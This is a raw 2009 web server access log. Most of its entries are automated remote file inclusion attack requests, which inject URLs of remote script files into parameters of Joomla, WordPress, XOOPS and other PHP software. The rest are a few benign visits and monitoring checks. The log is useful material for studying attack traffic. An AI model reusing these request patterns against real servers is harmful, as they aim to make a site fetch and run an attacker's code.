74.53.70.114 - - [22/Jun/2009:02:17:32 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:02:17:32 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:02:17:32 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:02:17:57 -0400] "GET /?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:02:17:57 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:02:17:57 -0400] "GET /logs/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:02:19:08 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:02:19:10 -0400] "GET /logs/error_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:19:25 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:19:25 -0400] "GET /logs/access_log.Q109050700%20%20///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:19:25 -0400] "GET ///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:19:31 -0400] "GET /logs/access_log.Q109060100%20%20///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:19:32 -0400] "GET ///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:19:33 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:19:33 -0400] "GET /logs/access_log.Q109050700///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:19:41 -0400] "GET /logs/access_log.Q109060100///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:20:09 -0400] "GET ///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:20:09 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:20:09 -0400] "GET /logs/access_log.Q109050700///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:02:20:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.74.99.225 - - [22/Jun/2009:02:20:17 -0400] "GET /logs/access_log.Q109060100///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:20:56 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:20:56 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:20:57 -0400] "GET /logs/access_log.Q109060300//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:21:01 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:21:01 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:21:01 -0400] "GET /logs/access_log.Q109060300//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.82.79.104 - - [22/Jun/2009:02:21:01 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
203.82.79.104 - - [22/Jun/2009:02:21:01 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 2545 "http://www.aceonlinestore.com/images/ACE_BoneGraft_04.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
203.82.79.104 - - [22/Jun/2009:02:19:54 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 200 9952673 "http://www.google.com.my/search?hl=en&ei=wSI_Sv_RJs6HkAXWrYiVCA&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=shepherd+sinus+elevator&spell=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
203.82.79.104 - - [22/Jun/2009:02:21:04 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 4321 "http://www.aceonlinestore.com/images/ACE_BoneGraft_04.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
203.82.79.104 - - [22/Jun/2009:02:21:05 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 245 "http://www.aceonlinestore.com/images/ACE_BoneGraft_04.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
203.82.79.104 - - [22/Jun/2009:02:21:05 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 710 "http://www.aceonlinestore.com/images/ACE_BoneGraft_04.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
203.82.79.104 - - [22/Jun/2009:02:21:06 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 3396 "http://www.aceonlinestore.com/images/ACE_BoneGraft_04.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
203.82.79.104 - - [22/Jun/2009:02:21:06 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 4321 "http://www.aceonlinestore.com/images/ACE_BoneGraft_04.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
203.82.79.104 - - [22/Jun/2009:02:21:04 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 271311 "http://www.aceonlinestore.com/images/ACE_BoneGraft_04.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
69.64.89.139 - - [22/Jun/2009:02:21:17 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:21:17 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:21:17 -0400] "GET /logs/access_log.Q109060300%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:21:23 -0400] "GET /logs/access_log.Q109060400%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:21:34 -0400] "GET /logs/access_log.Q109060400//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:21:38 -0400] "GET /logs/access_log.Q109060400//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:02:23:18 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.82.79.104 - - [22/Jun/2009:02:21:13 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.1" 206 9635402 "http://www.aceonlinestore.com/images/ACE_BoneGraft_04.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
117.74.99.225 - - [22/Jun/2009:02:24:25 -0400] "GET ///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:24:26 -0400] "GET /logs///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:24:26 -0400] "GET /logs/access_log.Q109050700///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:25:00 -0400] "GET /logs/access_log.Q109060100///appserv/main.php?appserv_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:25:02 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:25:02 -0400] "GET /logs/access_log.Q109060300//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:02:25:02 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:02:25:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.17.151 - - [22/Jun/2009:02:25:18 -0400] "GET /logs/access_log.Q108092000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.64.89.139 - - [22/Jun/2009:02:25:30 -0400] "GET /logs/access_log.Q109060400//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:25:36 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:25:36 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:25:36 -0400] "GET /logs/access_log.Q109050800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:26:04 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:02:28:04 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:02:28:04 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:02:28:04 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:02:29:33 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [22/Jun/2009:02:29:42 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
218.249.36.194 - - [22/Jun/2009:02:29:43 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
218.249.36.194 - - [22/Jun/2009:02:29:44 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
218.249.36.194 - - [22/Jun/2009:02:29:45 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
117.74.99.225 - - [22/Jun/2009:02:30:04 -0400] "GET ///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:30:04 -0400] "GET /logs/access_log.Q109051900///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:02:30:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.125.126.72 - - [22/Jun/2009:02:30:12 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.79"
116.125.126.72 - - [22/Jun/2009:02:30:13 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
116.125.126.72 - - [22/Jun/2009:02:30:13 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
66.225.217.11 - - [22/Jun/2009:02:31:00 -0400] "GET /logs//saveserver.php?thisdir=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:31:00 -0400] "GET //saveserver.php?thisdir=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:31:00 -0400] "GET /logs/access_log.Q109050700//saveserver.php?thisdir=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:31:03 -0400] "GET //saveserver.php?thisdir=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:31:03 -0400] "GET /logs//saveserver.php?thisdir=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:31:03 -0400] "GET /logs/access_log.Q109050700//saveserver.php?thisdir=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:31:07 -0400] "GET /logs/access_log.Q109051200//saveserver.php?thisdir=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:31:10 -0400] "GET /logs/access_log.Q109051200//saveserver.php?thisdir=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:31:41 -0400] "GET /logs/access_log.Q109050800%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:31:44 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:32:02 -0400] "GET ///admin/common.inc.php?base_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:32:02 -0400] "GET /logs/access_log.Q109051800///admin/common.inc.php?base_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:32:02 -0400] "GET /logs///admin/common.inc.php?base_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.250.85.185 - - [22/Jun/2009:02:34:46 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
61.250.85.185 - - [22/Jun/2009:02:34:47 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
61.250.85.185 - - [22/Jun/2009:02:34:47 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
66.225.217.11 - - [22/Jun/2009:02:34:59 -0400] "GET //galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:34:59 -0400] "GET /logs//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:34:59 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:02 -0400] "GET //galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:05 -0400] "GET /logs//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:05 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:06 -0400] "GET /logs//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:07 -0400] "GET //galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:07 -0400] "GET //galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:07 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:07 -0400] "GET /logs//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:07 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:09 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:11 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:02:35:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.225.217.11 - - [22/Jun/2009:02:35:15 -0400] "GET //galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:15 -0400] "GET /logs//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:15 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:02:35:18 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:36:23 -0400] "GET /logs/access_log.Q109051800%20%20///admin/common.inc.php?base_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
116.125.126.72 - - [22/Jun/2009:02:36:50 -0400] "GET /logs/access_log.Q109052200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.79"
117.74.99.225 - - [22/Jun/2009:02:37:13 -0400] "GET ///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:37:13 -0400] "GET /logs///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 6516 "-" "Mozilla/5.0"
117.74.99.225 - - [22/Jun/2009:02:37:16 -0400] "GET /logs/access_log.Q109051900///?sourcedir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:37:18 -0400] "GET /logs//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 6515 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:37:19 -0400] "GET //?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:37:25 -0400] "GET /logs/access_log.Q109052900%20%20//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:02:37:46 -0400] "GET /logs/error_log.Q109052000%20%20//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.38.128.43 - - [22/Jun/2009:02:38:49 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.38.128.43 - - [22/Jun/2009:02:38:49 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.38.128.43 - - [22/Jun/2009:02:38:49 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.38.128.43 - - [22/Jun/2009:02:38:59 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.125.126.72 - - [22/Jun/2009:02:39:57 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.79"
116.125.126.72 - - [22/Jun/2009:02:39:57 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
116.125.126.72 - - [22/Jun/2009:02:39:58 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
60.30.5.11 - - [22/Jun/2009:02:40:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; .NET CLR 1.1.4322)"
